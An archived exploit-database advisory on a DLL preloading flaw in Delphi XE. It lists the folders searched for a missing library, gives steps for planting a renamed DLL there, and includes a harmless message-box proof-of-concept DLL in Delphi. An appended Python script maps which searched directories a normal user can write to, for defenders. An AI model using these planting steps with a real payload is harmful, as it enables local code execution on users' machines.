[local exploits] - Embarcadero Delphi XE (2011) DLL preloading exploit
Posted on 25 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Embarcadero Delphi XE (2011) DLL preloading exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: local exploits | Exploit author: STRELiTZIA | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /></head><body><pre>
===================================================
Embarcadero Delphi XE (2011) DLL preloading exploit
===================================================

Exploit Title : [Embarcadero Delphi XE (2011), DLL preloading exploit]
Author        : [STRELiTZIA]
Software      : [Delphi XE (2011)]
Tested on     : [Windows XP SP3]

============================
= Description =
============================

Delphi XE searches for and loads a non-existent "dcc150il.dll" library without any checks
or visual warning about library modifications.

This vulnerability can allow attackers to execute malicious code locally, without user
consent, in the privilege context of the targeted application.

============================
= Instructions =
============================

Default search folders (in the order the loader tries them):

%C%:\Program Files\Embarcadero\RAD Studio\8.0\bin\dcc150il.dll
%C%:\WINDOWS\system32\dcc150il.dll
%C%:\WINDOWS\system\dcc150il.dll
%C%:\WINDOWS\dcc150il.dll
%C%:\Documents and Settings\%User%\%My documents%\RAD Studio\Projects\dcc150il.dll
%C%:\Documents and Settings\All Users\Documents\RAD Studio\8.0\BPL\dcc150il.dll
%C%:\WINDOWS\system32\wbem\dcc150il.dll

1- Copy "Test.dll" into one of the listed folders
2- Rename "Test.dll" to "dcc150il.dll"

============================
= Tests =
============================

- Launch Embarcadero Delphi XE.
- File ->> New ->> VCL Forms Application - Delphi.

============================
= Test Dll Source "Delphi" =
============================

Library Test;

uses Windows;

{ The library's initialization block runs as soon as the DLL is loaded. }
begin
  MessageBoxA(0,
    PChar('Yep, I''m running in your system without your permission.'),
    PChar('Sample'),
    MB_ICONSTOP);
end.

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>
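The folder list above is the standard Windows DLL search order (SafeDllSearchMode on) applied to the Delphi XE install. The following added audit script, not part of the advisory, models that order for a given DLL name and reports which searched directories a non-admin user could write to, so a defender knows which locations to ACL-harden or monitor. The directory layout, user name and writable-directory set are constructed to mirror the advisory's Windows XP paths.

```python
import ntpath

# Constructed layout mirroring the advisory's Windows XP / Delphi XE install.
APP_DIR = r"C:\Program Files\Embarcadero\RAD Studio\8.0\bin"
SYSTEM32 = r"C:\WINDOWS\system32"
WINDOWS = r"C:\WINDOWS"
CWD = r"C:\Documents and Settings\alice\My Documents\RAD Studio\Projects"
PATH_DIRS = [SYSTEM32,
             r"C:\Documents and Settings\All Users\Documents\RAD Studio\8.0\BPL",
             r"C:\WINDOWS\system32\wbem"]
# Constructed ACL summary: directories a non-admin user can write to.
USER_WRITABLE = {CWD, PATH_DIRS[1]}


def search_order(app_dir=APP_DIR, system32=SYSTEM32, windows=WINDOWS,
                 cwd=CWD, path_dirs=PATH_DIRS):
    """Windows DLL search order with SafeDllSearchMode on (the XP SP2+ default):
    application dir, System32, System, Windows, current dir, then PATH entries.
    Duplicates (e.g. System32 repeated in PATH) are dropped, keeping first hit."""
    raw = [app_dir, system32, ntpath.join(windows, "system"), windows, cwd, *path_dirs]
    seen, order = set(), []
    for d in raw:
        key = ntpath.normcase(d)
        if key not in seen:
            seen.add(key)
            order.append(d)
    return order


def resolve_dll(name, order, existing_files):
    """Directory the loader would take NAME from, or None when no copy exists
    anywhere (the advisory's situation: dcc150il.dll is not shipped at all)."""
    present = {ntpath.normcase(f) for f in existing_files}
    for d in order:
        if ntpath.normcase(ntpath.join(d, name)) in present:
            return d
    return None


def exposed_dirs(name, order, existing_files, user_writable):
    """Directories searched before the legitimate copy that a non-admin can write
    to. With no legitimate copy at all, every writable directory in the order counts."""
    winner = resolve_dll(name, order, existing_files)
    writable = {ntpath.normcase(d) for d in user_writable}
    out = []
    for d in order:
        if winner is not None and ntpath.normcase(d) == ntpath.normcase(winner):
            break
        if ntpath.normcase(d) in writable:
            out.append(d)
    return out
```

Shipping a real `dcc150il.dll` in the application directory (or removing the load entirely) empties the exposed list, which is the fix the model makes visible.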